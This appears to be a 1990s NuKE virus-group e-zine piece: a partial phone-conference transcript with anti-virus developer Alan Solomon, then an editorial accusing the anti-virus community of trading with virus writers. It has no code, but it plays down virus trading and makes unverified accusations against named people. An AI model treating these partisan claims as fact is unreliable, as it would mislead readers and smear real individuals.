for Dr. Alan Soloman"
SO> Let me give you the accurate information on Cary, Cary isn't a lady, Cary is
a man.
AR> Pardon me.
SO> Secondly, he works for a company called Land Vision, and sells our AntiVirus
toolkit.
AR> Well that lady-
SO> He's not a lady.
AR> Well okay, that person-
SO> MAN
AR> okay, that man was never on my board, the only Finnish person on my board,
is that guy named Janhontalo, okay.
SO> Doesn't ring a bell.
AR> Well, I'm kinda disturbed by it, cuz I believe when the school kicks back
up, and they read this, huh.... The only person that knows about this right
now is the dean.
SO> Well I think, that if certain of my views were not true, then certainly we
would do a retraction.
AR> The chancellor of the college will be, very shortly, Margaret Thatcher.
SO> Really?
AR> Oh Yes! She'll be the chancellor as of the 1st of July, 1993.
SO> So what is the true situation? So what you said was, that you took the
Black Axes down?
AR> No! What I said was the virus exchange, the virus stuff, is down!
SO> So the Black axes is still running?
AR> Yes.
SO> Do you have any viruses on it?
AR> For download, NO. There are 10 people that have access to that, on my board.
SO> So there are no viruses for download?
AR> Only 10 people have access to that, on my board!
SO> Who are they?
AR> ah, sure if you wanna do that, sure! You want me to name who's on there?
SO> Yeah.
AR> Some of these people are going to be mighty upset! These are AntiVirus
software people. Joe knows these people call, I know when he writes
something he doesn't go off to these people and tell them...
AR> You know many don't trust my judgment, on whom I give these viruses to, is
what this all comes down to. How come then so many of my viruses have the
S & S International logo in them?
SO> Frankly, I'd like to know that too. [S&S International is Solomans Company.]
AR> Well I already got the connection made! Well we've talked about David Chess,
and he is suspected with trading with McAfee.
SO> Suspect is the wrong word, I think he does!
AR> Alright then, also we have a fellow by the name of Joseph Whales. Joe Whales
is good buddies with guys in the NCSA, I got the whole NCSA collection!
I got everything David Stang has put his hands on!
SO> Most of it is junk, you know that! [NCSA Virus Collection]
AR> Well there is more in there than just junk.
SO> That's true, I'm not saying its all junk. I keep seeing these files
beginning with exclamation marks, going round, and round, and round.
AR> I got the entire collection, I got 8 megs of junk!
SO> That's nothing I got 110 megs of junk. [Glad to see you're proud of it!]
AR> Now then, this guy on the phone with me right now (Joe) doesn't write
viruses to put on peoples systems and NuKE the whole world! That's _not_
what we both do. I'm just interested in where they go, and what disturbs
me is all the people running around out there, claiming this `Big Threat'
You even stated in your articles that many in my collection were viruses,
but there was an awful lot of junk.
SO> Yes, that's right.
AR> True, no problem with that. But that's the representative of what's going
around the country! See, this is what is represented on what's out there.
And its not that big a threat!
SO> It's not that big of a threat, for what?
AR> ARCV is being busted and charged for some viruses they didn't write Alan!
SO> Which viruses?
RS> All of them!
AR> Well they didn't write the McWhale, or the KoolMac...
SO> Why do you say they're being busted for those viruses?
AR> Because it's listed in an article, by someone up there in Scotland Yard,
saying if anybody got infected by any of these viruses, to contact them!
SO> I don't know where Scotland Yard got the idea they wrote McWhale, I could
have told them that!
AR> All of them are MPC viruses, nothing more.
SO> Well wait a minute, it depends on whom you believe is a member of ARCV!
AR> Do they think I'm a member of ARCV?
SO> Well Apache Warrior has been telling them that you are!
AR> Hah, I'm in the United States, and you're telling me I'm a member of ARCV!
RS> ARCV is SOLELY England
SO> Well that's what he has been telling them! Ask Apache Warrior.
AR> Well I didn't know this.
SO> Yes you did!
AR> That I've been a member of ARCV?
SO> You knew he's been saying that!
RS> Since when, do you want to clarify this.
SO> Since when what?
RS> You say John knows, what makes you so sure?
SO> Because the last time I spoke to John 2-3 months ago..
AR> I know we talked about him, and I know he narced all his friends! But I
don't think you told me, that he said I was a member of ARCV!
RS> Alan do you have a copy of the ARCV news-journal? Their first news journal
and only news journal, all members are listed inside there, and Aristotle
is not listed inside there.
SO> Do you have a copy of the second journal?
RS> The second journal was never released.
SO> ah, John's got a copy.
AR> Of the Second Journal?
RS> The second journal does not exist.
SO> John's got a copy.
AR> Tell me which one its in now, and I'll look it up! Is it in the collection
I sent you?
SO> Yeah.
AR> Does it have me listed in that?
SO> No, it doesn't.
AR> This is why I keep hearing feedback of people wanting to extradite me to
England.
SO> Possibly, I can well imagine.
AR> Based on what a 19 year old phreaker has said. And also now, with my name
going around being `Back in Business'...
SO> Well I don't know what he's basing that claim with, if he's got any files,
or anything. I don't know. What I do know is that six months ago, he was
facing fairly big trouble.
AR> And because he's been talking... well you know...
SO> He was facing big trouble, because he got caught stealing large amounts
of telephone time from his next door neighbour. In an extraordinary stupid
manner, by the way.
AR> Yeah I know, he just went backdoor and plug a phone line into it...
SO> There's no way he could have gotten away with that.
AR> Humm, interesting. So how can I get Scotland Yard to call me?
SO> You can call them, I'll give you the phone number.
AR> Naa, wouldn't do any good. So like once this trial starts, they may bring
me over?
SO> I don't know, you can send them a letter. The person in charge of the case
in Scotland Yard is, Inspector John Hoston.
AR> humm okay.
SO> I can understand why you're pissed off. But Joe, what's your involvement in
this? Why are you part of the phone call?
RS> Why not?
SO> There's no reason why not.
AR> I'll tell you why, cuz I asked him, as I'm putting an article in NuKE Info
six. It basically explains my side, on how everything transpires.
SO> Did Nowhere Man really write the NuKE Encryption Device, by himself!
RS> Yes he did, why?
SO> Well because I saw it.
RS> Well that was just a Beta Release v.90.
SO> No, I've seen the final!
RS> uh? What version do you have?
SO> oh sorry, we're not suppose to?
RS> version .90.
SO> No its version 1.00
RS> That does not exist!
SO> I've got a thing that calls itself the N.E.D. v1.00, it might be, of course.
RS> I'll tell you right now, it's version .90
SO> Is there some bytes I can read out to help to identify it?
RS> Not really, because version 1.00 changed dramatically.
<anyhow, after a bit of blahing, this so-called NED v1.00 is really v.90 that
was renamed and inserted into a new virus originating from Europe.>
For the most part, this was the main concern of the conversation that we wanted
to bring out. This is only about 1/5 of the total conference; as a matter of
fact it was the first hour of the conference, and judging by tone of voice it
was fairly hostile. But we are not ones to judge a person by his background or
occupation in life, so it would only be fair to say that Alan Soloman was a
fairly reasonable man to talk to.
Interestingly enough, Alan did drop his guard, so who said Soloman's package
was unbeatable? The rest of the conversation focused on ideas, ideologies,
morals and some of the unexpected problems caused by this structured AntiVirus
bludgeon.
Problems, you say? Who would have expected such a problem? The community
responsible for `cleaning up' the virus problem has done a good job of that, but
who would have expected them to leave behind a muddy trail of destruction
wherever they go? It all begins with the first Anti-Virus package, determined
to detect and wipe out any known virus out there. Note the word `KNOWN'. So
basically, you have to collect viruses, and perhaps have people collecting for
you, so that you can add them to your Anti-Virus package and gain the cutting
edge over your competitors. Now, the remaining successful virus packages have
somewhat localized by geographic region: McAfee Scan has dominated North
America, Vet7 has dominated the Australian and Asian region, and you can
conclude that Frisk has gained a fair amount of support in Europe, as has
Soloman's package.
Now then, this is only because of geographic location. If someone in California
notices a new virus, the first person he'll call and give this virus to is,
naturally, McAfee. The same goes for Soloman and people crying out in England
(UK). Now, to gain that cutting edge, wouldn't you need all of those viruses
from across the world, so that you could even begin to gain world-wide market
share? Naturally. So what do you do? You can form alliances with other
Anti-Virus programmers, but that isn't enough, and perhaps it is unfair. Unfair
in the sense that an alliance between Soloman and McAfee would be to Soloman's
advantage: surely McAfee covers a wider population and receives new viruses at
a much faster pace compared to his English counterpart. So we're stuck between
a rock and a hard place, again.
Hey, <light bulb blazing above, yeah!>, why not form an association with
members pertaining to all these continents, and bring our collections
together to form an Even Bigger collection? Sure! Great idea! Let's call it
NCSA! Yeah! Then another newfy pops up and screams, CARO! Yeah, another group.
But what happens now? To our amazement, we have gentlemen roaming the under-
ground technodrome, mission: collect new viruses. Having no statute they will
resort to anything in order to gain new viruses. Somehow, our "heroes" that
claim to save us from the virus problem are low-down, bottom-of-the-food-chain
infantiles, resorting to immoral methods to gain viruses. Huh? Explain?
Humm, I will use myself as an easy example. I, Rock Steady, along with Pure
Energy, manage a bulletin board known as Cybernetic Violence, the main
headquarters of NuKE. We're looked upon as `evil-doers', misdirected youths,
bullies that now know how to type, scum, satan's helpers <my personal
favourite>; I believe you get the picture? And yes, it isn't a pretty one for
sure. You may call this harassment; as a matter of fact it _is_ harassment. Now
then, where can you get the latest virus put out by the intellectually
challenged mind? Of course, the mischievous virus groups. Oh no, this guy won't
give me virus access unless I show him I'm `deserving' of it. Okay, I got it,
let me upload you my whole NCSA virus collection...
Get the picture? Yes, we all heard it before, I'm a deranged liar. The Anti-
Virus community is _not_ maniacal to associate themselves with us. We all
heard of Sara Gordon screaming out, `I never called an underground exchange
board'; she will never admit it. Nevertheless Sara Gordon holds the phone
number of Cybernetic Violence, Black Axes, The Hell Pit, etc, etc. Sara doesn't
associate herself with low-lives like ourselves, as she explains. Nevertheless,
she has CLAIMED to have called up The Hell Pit BBS, and uploaded 3 fake viruses,
and exclaims how easy it was to obtain virus access there. Now there's a
contradiction. Now who are you going to believe? Rock Steady, with a record for
hacking and suspected of other cyber-crimes, or Sara Gordon with not even a
bug-stain on her record? Wait, let me tell you some more. Sara Gordon is not
totally `white'; since Sara doesn't associate herself with `us', I guess the
conversation we had concerning her wanting to invite a person called `Nowhere
Man' to dinner was a figment of my imagination. Also, the crap she said to me
about getting her in contact with virus writers in Australia was a figment
of my vivid imagination. Come on Sara, I heard it and you said it. Of course,
this is simply my word against yours. Son of a gun Sara, didn't you hear all
them `clicking' noises during our conversation? There was someone else on the
line, Sara! Someone that kept on receiving calls, and therefore he/she had to
switch and answer the call, via Ma Bell's `Call Waiting' service.
See, I guess this isn't, after all, just a figment of my imagination. Since I
conferenced the call, my phone bill supports the fact that TWO calls were made
at the same time from my number! One was to the alleged person in the
background while the other was yours! (Sara)
Oh yes, I'm a bored teenager, deranged liar wanting to bust balls. Frankly, no
one admitted into NuKE is a teenager. Frankly, I'm currently in a respectable
banking position; nevertheless I still am pursuing my Masters in Mathematics,
and this may even lead to a Ph.D., of course by then I'm expected to sprout out
of my satanic puberty stage and into adulthood. Even though I'm way past the
legal adult age, may you still say it's a hormone thing. Frankly, when justice
is not done and lies are tossed over to the public, discrediting our history,
with your influence of power <Yes, corruption of power>, until that day of
justice, until that day the truth comes out, then that will be the day you will
get rid of me. You see, this isn't about me, this is about you. <The AntiVirus
community> This isn't something you `mature out of'; when do you mature out of
injustice? At what point in life is injustice okay?
The Virus problem has been solved, now what about the Anti-Virus Problem?
Rock Steady
NuKE: The Anti-Anti-Virus Group!
================================================================================